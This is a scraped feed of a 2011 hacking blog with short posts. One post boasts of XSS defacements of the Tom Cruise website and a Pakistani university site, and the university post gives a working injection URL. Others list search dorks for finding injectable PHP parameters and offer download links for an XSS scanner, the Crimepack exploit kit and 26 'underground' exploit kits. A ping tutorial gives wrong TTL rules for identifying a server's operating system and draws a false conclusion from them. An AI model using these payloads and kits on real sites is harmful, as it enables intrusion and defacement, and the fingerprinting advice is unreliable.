href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3OxcuUeKdB1sl1Jhx88Ep_NjuktLL4NV9nooGrvv4_GJuc2KqzJIyH1pcXPAIOHefpipeWnchd45VS6q7OIVjgqJTO1bLcZpq2LhMBYQA1wtfeby0gi_mmTt2wb8w9VkVVQ4ANueHgYb9/s1600/ping.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}">1)Goto run->type CMD</a></b></i></i></span></span></div><div><span class="Apple-style-span"><span class="Apple-style-span" ><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;"><b><i><br /></i></b></span></span><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><b><i>IN CMD type</i></b></i><br /></span><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><b><i>ping Target _Website_Name </i></b></i><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; ">. Forexample- ping facebook.com<br /></i></span><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i>Now you will see several ping requests coming</i></span></div><div><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><div class="wp-caption aligncenter" id="attachment_811" style="width: 479px; display: inline !important; "><div class="wp-caption-text" style="display: inline !important; ">Ping Google Server</div></div></i></span><div></div><div><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><b><i>We Are interested in seeing the TTL time which you can see at the end of each request in ping.</i></b></i><br /><i><b><i>NOTE:- </i></b></i><br /><i><b><i>1) If TTL <64 then the server is Linux based</i></b></i><br /><i><b><i>2) If TTL>64 but <128 then the server is Windows bsaed</i></b></i><br /><i><b><i>3) TTL>128 Mac and others.</i></b></i></span></div></div><div><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><b><i>From the above screenshot, it is clear that the servers of facebook are </i></b></i></span><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><b><i>Mac and others</i></b></i></span></div><div><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><b><i><br /></i></b></i></span></div><div><span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><i>Note:- In some Cases you may not get ping replies ( Eg. you try it on your friend’s PC ). Now This can have two reasons, The server is down ie.. The machine is not connected to internet. Else the most common reason, The Firewall is protecting that PC and is not allowing your request to access that system</i></i></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-34481173278988533362011-06-24T13:19:00.000-07:002011-06-24T13:23:16.516-07:00Official Tom Cruise Website Site XSS Attack by Hitcher<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVZ6VkXzq39y-SlU3XJcy9UVw0nsdkzvy-fwP5hxAwcPci1xTTjGfaalOn0LLYlLwPJRy7AoIS89icbHsmtQVmJ9KmCmsmIKNIM4JWLvedHpnRsLqHAt6Xcgxqo2MFY285VZ7M06Oygosf/s1600/Tomcruise.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 225px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVZ6VkXzq39y-SlU3XJcy9UVw0nsdkzvy-fwP5hxAwcPci1xTTjGfaalOn0LLYlLwPJRy7AoIS89icbHsmtQVmJ9KmCmsmIKNIM4JWLvedHpnRsLqHAt6Xcgxqo2MFY285VZ7M06Oygosf/s400/Tomcruise.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5621884178731295122" /></a><br /><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "><br /></span></div><div><span class="Apple-style-span" ><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; ">Official Tom Cruise Website Site XSS Attack by Hitcher </span><span class="Apple-style-span" style="border-collapse: collapse; color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; ">HERES the link <a href="http://bit.ly/kqnwrH" rel="nofollow" target="_blank" style="cursor: pointer; color: rgb(59, 89, 152); text-decoration: none; ">http://bit.ly/kqnwrH</a></span></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-79395560147134605892011-06-18T13:25:00.001-07:002011-06-18T13:28:03.217-07:00Ctrl+C is unsafe on Internet Explorer<div><br /></div><div>Ctrl+C may be the most important work we do everyday. But it's not a very safe thing to do. Read on to know why. What happens when you press Ctrl+C while you are Online... We do copy various data by Ctrl + C for pasting elsewhere.</div><div><br /></div><div>This copied data is stored in clipboard and is accessible from the net by a combination of Javascripts and ASP.</div><div><br /></div><div>Just try this:</div><div>Note: works only when u are using "Internet Explorer.."</div><div><br /></div><div>1) Copy any text by Ctrl + C</div><div>2) Click the Link: <<a href="http://www.sourcecodesworld.com/special/clipboard.asp"> http://www.sourcecodesworld.com/special/clipboard.asp</a></div><div><br /></div><div>3) You will see the text you copied was accessed by this web page.</div><div><br /></div><div>Do not keep sensitive data (like passwords, credit card numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information.</div><div><br /></div><div>SAVE YOURSELF FROM ONLINE FRAUDS!!!!</div><div><br /></div><div>Note: works only when u are using "Internet Explorer.."</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-82870638861241335812011-06-04T06:45:00.000-07:002011-06-04T06:57:45.007-07:00XSS Scanner 1.0<div><br /></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE4CJnr-qw4dE6FkinIb8Arl-_RFED0OR9puYIu52xWl7IUxKfVW_OWjCI3IqHjmzqdBDdtZYawwTjB-VKZuuRXJ1Vn7Za3yw7mgSUaUzgOqwRMgijzvCYX2-0wRkdL3m4ntRrH16l8Lv8/s1600/copy44jf7.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 321px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE4CJnr-qw4dE6FkinIb8Arl-_RFED0OR9puYIu52xWl7IUxKfVW_OWjCI3IqHjmzqdBDdtZYawwTjB-VKZuuRXJ1Vn7Za3yw7mgSUaUzgOqwRMgijzvCYX2-0wRkdL3m4ntRrH16l8Lv8/s400/copy44jf7.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5614362031788181266" /></a><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVLetNpMWmQclHtTLOf8ZH0blP6GslKV4Uiq9Sqky8Uq-sZD0mUtuWdjmqNRGzvmGgWpGPzJCe1z_FPHgxuQy7tRVngWsuls4IEQn0dAehYoHT8KP7lATJbs9ysBakS1STc0EqvdI3w0xI/s400/cheatdbiz5.png" style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 319px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5614362206558370386" /> <div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><span class="Apple-style-span" ><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">20 dork exemples:</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?cmd="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?z="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?q="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?search="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?query="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?searchstring="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?keyword="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?file="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?years="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?txt="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?tag="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?max="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?from="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?author="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?pass="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?feedback="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?mail="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?cat="</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">inurl:".php?vote="</span></span><br /><br /><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">| Generic | .biz | .com | .info | .name | .net | .org | .pro | |</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">+-----------------+--------+--------+--------+--------+--------+--------+--------+--------+-------+--------+---------+-------+---------+</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; ">| Sponsored | .aero | .asia | .cat | .coop | .edu | .gov | .int | .jobs | .mil | .mobi | .museum | .tel | .travel |</span></span><br /><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 20px; "> Download link click <a href="http://www.multiupload.com/Q38RJND445"><span class="Apple-style-span">here </span></a></span></span></span></div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8876165229323819727.post-83751817555825064422011-06-04T06:03:00.000-07:002011-06-04T06:12:23.317-07:00XSS Attack On Website Of Ghulam Ishaq Khan Institute of Engineering Sciences and Technology by Hitcher<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisTESCa2MwvAqnFsQqQO8yHO5hyLEHpabWfbIXIPDl7VvkyX9zXllPxfCybNplJQTayYPiOwwlIgzFry3cfgTVZL1Inp1RZYoqHT_QCTenHaPQ7jFJ8B-Zd8tQ9AEl_hePINfINOPrq5LA/s1600/xssattackongiki.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 206px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisTESCa2MwvAqnFsQqQO8yHO5hyLEHpabWfbIXIPDl7VvkyX9zXllPxfCybNplJQTayYPiOwwlIgzFry3cfgTVZL1Inp1RZYoqHT_QCTenHaPQ7jFJ8B-Zd8tQ9AEl_hePINfINOPrq5LA/s400/xssattackongiki.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5614351113673778706" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOJNcM4wIMJNQJO3x3_8dltrt_SS8LQUmBkg-iWj3tQNr2-PPDmbtziSPAXGoR4pBqqHUQ1db8Rflwc4mEKCtchWWicGBdlkm3VBO-JKu8Ai9jcnj8UMJU5Ce1hqC-W0GoNkrpzkrxFnUJ/s1600/giki+xxs+attacked.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><br /></a><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>.........................................For the Hacked Page Link Click <a href="http://www.giki.edu.pk/controlpanel/EditProfile.php?un='%22--%3E%3C/style%3E%3C/script%3E%3Cimg%20src=%22http://img102.herosh.com/2011/06/02/54297568.png%22%20alt=%22some_text%22/%3E%3Ch1%3Ehitcher%20is%20here%20%3Ch/1%3E%3Cscript%3Ealert(0x00342A)%3C/script%3E">Here</a> </div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8876165229323819727.post-90792843560932519602011-05-14T07:18:00.000-07:002011-05-14T07:19:45.637-07:00Online malware scanning engine<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihRSH3INyn0DAljpAENGXK2W9DAebgQTkY3jeX348Ny-EjMIRMA5F2EXvPqjkMucthHrU6PJ_25elrUAS2xcMsyY1Tjg5gCJpyYgAPRBwmk1a3MDXQep_erJp_BUMKkaggUd29AvtRlyJy/s1600/Malware+Analyser.png"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 348px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihRSH3INyn0DAljpAENGXK2W9DAebgQTkY3jeX348Ny-EjMIRMA5F2EXvPqjkMucthHrU6PJ_25elrUAS2xcMsyY1Tjg5gCJpyYgAPRBwmk1a3MDXQep_erJp_BUMKkaggUd29AvtRlyJy/s400/Malware+Analyser.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5606576294375687106" /></a><br />Qualys and Malware Analyser (Author : Beenu Arora), recently came into an agreement which will allow Qualys to use Malware Analyser tool on its online malware scanning engine. This would enable the users to perform more comprehensive scans on malicious executables.<br /><br />According to sources, the author shared the tool's source code only after signing NDA with the firm.<br /><br />Qualys® (www.qualys.com) headquartered in Redwood Shores is the leading provider of on demand IT security risk and compliance management solutions — delivered as a service.<br /><br />Malware analyser is a freeware tool for analysing malwares written in Python. The tool was initially open-source tool way back in 2009 but recently in 2010-11 the author has made some significant improvement in its core engine which has made it one of best static analysis tool.<br /><br />The tool can perform static and dynamic analysis and author has intentions to include the process analysis too coming future.<br /><br />The tool can be downloaded from <a href="http://www.malwareanalyser.com/home/">www.malwareanalyser.com </a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-52692674839255196402011-05-14T03:20:00.000-07:002011-05-14T03:22:16.384-07:00Crimepack 3.1.3 Exploit kit<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie0uzYD_rMvefaLf-evZAO3z5hqp9kkDGC9iT6VYtaCndZkdthk6CxT9lhWryMfnwTXLn5M0h8IJhGu7UXa1cKEsCMsUK6ZJDrM2RS6wuBE2tcBCAfWdN2FUoEqP-h3-opMkCJHfBAfzdR/s1600/crimpack-webstart2.png"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 298px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie0uzYD_rMvefaLf-evZAO3z5hqp9kkDGC9iT6VYtaCndZkdthk6CxT9lhWryMfnwTXLn5M0h8IJhGu7UXa1cKEsCMsUK6ZJDrM2RS6wuBE2tcBCAfWdN2FUoEqP-h3-opMkCJHfBAfzdR/s400/crimpack-webstart2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5606514956653232514" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />Download Here : <a href="http://www.multiupload.com/3HGKHWMRS5">http://www.multiupload.com/3HGKHWMRS5</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-5349954357587498882011-05-14T03:13:00.000-07:002011-05-14T03:16:01.979-07:0026 Underground Hacking Exploit KitList of Hacking Exploit Kits :<br /><br />Unknow<br />Tor<br />Target-Exploit<br />Smart pack<br />RDS<br />My poly sploit<br />multisploit<br />mypack-009<br />mypack-091<br />mypack-086<br />mypack-081<br />Mpack<br />Infector<br />Ice-pack-1<br />Ice-pack-2<br />Ice-pack-3<br />G-pack<br />Fire pack -1<br />Fire Pack -2<br />Fiesta -1<br />Fiesta -2<br />Cry 217<br />Armitage<br />Adpack -1<br />Adpack -2<br />0x88<br /><br />Download : <a href="http://www.multiupload.com/EFDCHHZ9ZD">http://www.multiupload.com/EFDCHHZ9ZD</a>Unknownnoreply@blogger.com0